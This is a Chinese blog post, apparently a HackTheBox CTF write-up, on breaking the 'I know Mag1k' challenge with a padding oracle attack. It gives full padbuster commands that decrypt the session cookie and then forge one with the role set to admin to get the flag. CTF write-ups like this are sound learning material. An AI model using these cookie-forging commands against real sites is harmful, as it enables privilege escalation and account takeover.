HackTheBox 复现系列:I know Mag1k
作者:互联网
前言
在自己进行测试的时候,尝试了目录扫描,爆破弱口令,SQL注入测试,无果。完成没有头绪,通过谷歌发现此篇文章
https://medium.com/@mrkarthik07/i-know-mag1k-a-padding-oracle-attack-745d3b0bb2b1
发现是利用 Padding Oracle attack 来解密 Cookie。太高级看不懂如下:
我对Padding Oracle攻击的分析和思考(详细):https://www.freebuf.com/articles/web/15504.html
操作
随意注册一个用户,进行登录
在 Kali 使用 padbuster
工具,命令如下:padbuster URL 需要解密的Cookie 8 -cookies "登录的Cookie"
padbuster http://167.71.143.20:30469/profile.php "qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" 8 -cookies "PHPSESSID=vhupjvokjsas3dk96dp7sal6t4;iknowmag1k=qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D"
然后选择:2
经过漫长的等待解出内容,我的网速太慢了
修改 role 为 admin
然后进行加密
padbuster http://167.71.143.20:30469/profile.php "qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" 8 -cookies "PHPSESSID=vhupjvokjsas3dk96dp7sal6t4;iknowmag1k=qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" -plaintext "{\"user\":\"admin\",\"role\":\"admin\"}"
成功得到加密的内容
替换Cookie 成功拿到 Flag
完成没有思路,也不了解怎么能联想到 Padding Oracle attack 。归于原因还是因为自己太菜
标签:Mag1k,3D%,2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%,2BS7NEdfc%,HackTheBox,Cookie,know,2BO 来源: https://www.cnblogs.com/yuyan-sec/p/14527302.html